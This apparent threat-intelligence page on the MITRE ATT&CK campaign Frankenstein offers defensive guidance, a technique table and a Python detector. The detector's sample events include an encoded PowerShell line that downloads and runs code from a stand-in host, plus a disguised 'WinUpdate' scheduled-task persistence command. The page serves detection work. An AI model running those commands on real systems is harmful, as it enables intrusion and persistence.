C0001: Frankenstein
Frankenstein was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including Empire. The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.[1]
Analyst context for executives and security teams
Frankenstein matters because it shows how a targeted campaign can be built from publicly available components rather than custom malware. For leaders, the practical issue is not the campaign name itself; it is whether the organization can detect and respond when legitimate administration features, scripting languages, open-source post-exploitation tooling, discovery commands, scheduled tasks, obfuscation, and web-based command-and-control are combined into one intrusion path.
Executive priority
Prioritize this as a control-validation and incident-readiness use case. ATT&CK does not identify the actors or provide campaign-specific detection logic, but the mapped behaviors touch common business-risk areas: user-driven execution, client-side exploitation, PowerShell/cmd/WMI/MSBuild abuse, persistence through scheduled tasks, internal discovery, local data collection, and exfiltration over C2/web channels. Executives should ask whether SOC, endpoint, network, and IR teams can correlate these behaviors across the kill chain rather than relying on single-tool signatures for a named campaign.
Technical view
Validate coverage against the related behaviors rather than the campaign label. Key checks include PowerShell and Windows command shell execution, WMI activity, MSBuild proxy execution, scheduled task creation or modification, masqueraded task/service names, command obfuscation and decoding activity, system/user/network/process discovery, local and automated collection, tool transfer, web protocol C2, and exfiltration over an existing C2 channel. Empire is the only related software identified and is described as a cross-platform, open-source remote administration and post-exploitation framework with PowerShell agents for Windows and Python agents for Linux/macOS.
Likely telemetry
- Endpoint process creation and command-line telemetry, especially PowerShell, cmd, WMI, MSBuild, and script interpreters
- PowerShell logging and script/block content where available
- Scheduled task and service creation, modification, naming, and execution records
- Endpoint file creation, archive, decode/deobfuscation, and tool-transfer evidence
- User, system, network configuration, and process discovery command activity
Detection direction
- Build detections around behavior chains: user execution or client exploitation followed by scripting, discovery, task/service persistence, collection, and outbound web communications.
- Tune for administrative false positives: PowerShell, WMI, scheduled tasks, MSBuild, and discovery commands are common in enterprise operations, so detections should use context such as unusual parent process, encoded or obfuscated command content, rare task names, unexpected execution path, or abnormal user/host baseline.
- Do not depend on tool names alone. The campaign description emphasizes open-source components and unrelated tool pieces, so coverage should focus on technique-level behavior and correlation.
- Check blind spots in script logging, command-line capture, endpoint visibility on non-Windows systems, proxy visibility for encrypted web traffic metadata, and retention needed to reconstruct collection-to-exfiltration timelines.
- Use the Empire relationship as a validation scenario for post-exploitation framework activity, but avoid assuming every matching behavior is Empire or Frankenstein without local evidence.
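The behavior-chain and false-positive points above, as an added example that is not part of the Glexia page or of ATT&CK: a small Python detector run over constructed process-creation events. It flags the three behaviors the technique table describes (encoded PowerShell from an Office parent, an update-themed scheduled task whose action lives in a user-writable path, MSBuild handed a dropped project file) and only reports hosts where more than one distinct technique is seen. Event field names, hostnames and paths are assumptions.

```python
import base64
import re
# Constructed sample process-creation events modelled on the technique table
# (encoded PowerShell, a "WinUpdate" task, MSBuild on a dropped file); not Talos data.
ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"host": "ws01", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": r"schtasks.exe /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR C:\Users\Public\wu.bat"},
    {"host": "ws01", "parent": "cmd.exe", "image": "MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\t.xml"},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},  # benign admin use
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
USER_WRITABLE = re.compile(r"\\(users\\public|appdata|temp)\\", re.I)

def decode_encoded_powershell(cmdline):
    # PowerShell's -EncodedCommand is Base64 over UTF-16LE; return the text or None.
    m = re.search(r"(?:-e|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    # Map one event to a technique ID; parent/path context trims admin false positives.
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    if image == "powershell.exe" and parent in OFFICE_PARENTS and decode_encoded_powershell(cmd):
        return "T1059.001"   # encoded PowerShell launched by an Office process
    if image == "schtasks.exe" and re.search(r"/create", cmd, re.I):
        tn = re.search(r"/TN\s+(\S+)", cmd, re.I)
        if tn and "update" in tn.group(1).lower() and USER_WRITABLE.search(cmd):
            return "T1053.005"   # update-themed task name, action in a user-writable path
    if image == "msbuild.exe" and USER_WRITABLE.search(cmd):
        return "T1127.001"   # MSBuild handed a project file from a user-writable path
    return None

def correlate(events, min_techniques=2):
    # Group hits per host; only hosts showing a chain of distinct techniques are returned.
    hits = {}
    for ev in events:
        tid = classify(ev)
        if tid:
            hits.setdefault(ev["host"], set()).add(tid)
    return {h: sorted(t) for h, t in hits.items() if len(t) >= min_techniques}
```

The single admin PowerShell event on ws02 never reaches the correlation output, which is the point of chaining rather than alerting on each tool name.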
Mitigation priorities
- Harden and monitor scripting and administrative execution paths first: PowerShell, cmd, WMI, MSBuild, and scheduled task usage should be governed, logged, and restricted where business operations allow.
- Strengthen user-execution defenses for malicious files and document/template abuse through safe handling controls, attachment inspection, endpoint prevention, and user reporting workflows.
- Reduce post-exploitation opportunity by enforcing least privilege, limiting unnecessary administrative tooling exposure, and reviewing scheduled tasks/services for unauthorized or misleading names.
- Improve collection and exfiltration resilience with sensitive-data location awareness, egress monitoring, network segmentation, and alerting on unusual automated collection or outbound transfer behavior.
- Use purple-team or detection-engineering tests mapped to the related ATT&CK techniques to produce audit-ready evidence of telemetry, alerting, triage playbooks, and response ownership.
Analyst notes and limits
The official campaign description identifies a highly targeted early-2019 campaign by unidentified actors using open-source tools, including Empire. The relationship set provides the most useful defensive context: execution, discovery, stealth, collection, command-and-control, persistence, and exfiltration techniques. Treat this as an ATT&CK-informed validation package, not as evidence of current activity or attribution.
ATT&CK provides no official detection text, no campaign-specific platforms or tactics on the campaign object, and limited campaign detail beyond the cited Talos report and relationships. Local environment telemetry, asset criticality, normal administrative behavior, and incident evidence are required to determine exposure, coverage, and priority.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1057 | Process Discovery | During Frankenstein, the threat actors used Empire to obtain a list of all running processes.[1] |
| Enterprise | T1082 | System Information Discovery | During Frankenstein, the threat actors used Empire to obtain the compromised machine's name.[1] |
| Enterprise | T1027.010 | Command Obfuscation (sub-technique) | During Frankenstein, the threat actors ran encoded commands from the command line.[1] |
| Enterprise | T1020 | Automated Exfiltration | During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.[1] |
| Enterprise | T1053.005 | Scheduled Task (sub-technique) | During Frankenstein, the threat actors established persistence through a scheduled task named "WinUpdate", created with the command `/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR`.[1] |
| Enterprise | T1204.002 | Malicious File (sub-technique) | During Frankenstein, the threat actors relied on a victim to enable macros within a malicious Microsoft Word document likely sent via email.[1] |
| Enterprise | T1566.001 | Spearphishing Attachment (sub-technique) | During Frankenstein, the threat actors likely used spearphishing emails to send malicious Microsoft Word documents.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | During Frankenstein, the threat actors downloaded files and tools onto a victim machine.[1] |
| Enterprise | T1059.001 | PowerShell (sub-technique) | During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.[1] |
| Enterprise | T1518.001 | Security Software Discovery (sub-technique) | During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system.[1] |
| Enterprise | T1059.005 | Visual Basic (sub-technique) | During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.[1] |
| Enterprise | T1071.001 | Web Protocols (sub-technique) | During Frankenstein, the threat actors used HTTP GET requests for C2.[1] |
| Enterprise | T1221 | Template Injection | During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.[1] |
| Enterprise | T1203 | Exploitation for Client Execution | During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.[1] |
| Enterprise | T1059.003 | Windows Command Shell (sub-technique) | During Frankenstein, the threat actors ran a command script to set up persistence as a scheduled task named "WinUpdate", as well as other encoded commands from the command line.[1] |
| Enterprise | T1497.001 | System Checks (sub-technique) | During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMware and VirtualBox. The script would also call WMI to determine the number of cores allocated to the system; if fewer than two, the script would stop execution.[1] |
| Enterprise | T1047 | Windows Management Instrumentation | During Frankenstein, the threat actors used WMI queries to check if various security applications were running, as well as to determine the operating system version.[1] |
| Enterprise | T1119 | Automated Collection | During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.[1] |
| Enterprise | T1036.004 | Masquerade Task or Service (sub-technique) | During Frankenstein, the threat actors named a malicious scheduled task "WinUpdate" for persistence.[1] |
| Enterprise | T1005 | Data from Local System | During Frankenstein, the threat actors used Empire to gather various local system information.[1] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2.[1] |
| Enterprise | T1016 | System Network Configuration Discovery | During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system.[1] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.[1] |
| Enterprise | T1588.002 | Tool (sub-technique) | For Frankenstein, the threat actors obtained and used Empire.[1] |
| Enterprise | T1127.001 | MSBuild (sub-technique) | During Frankenstein, the threat actors used MSBuild to execute an actor-created file.[1] |
| Enterprise | T1033 | System Owner/User Discovery | During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information.[1] |
| Enterprise | T1573.001 | Symmetric Cryptography (sub-technique) | During Frankenstein, the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.[1] |
Groups, software, and campaigns
S0363: Empire
Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | e31a4b7d3f56… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Talos Frankenstein June 2019. Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
[2] mitre-attack C0001. MITRE ATT&CK campaign object C0001 (Frankenstein).
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.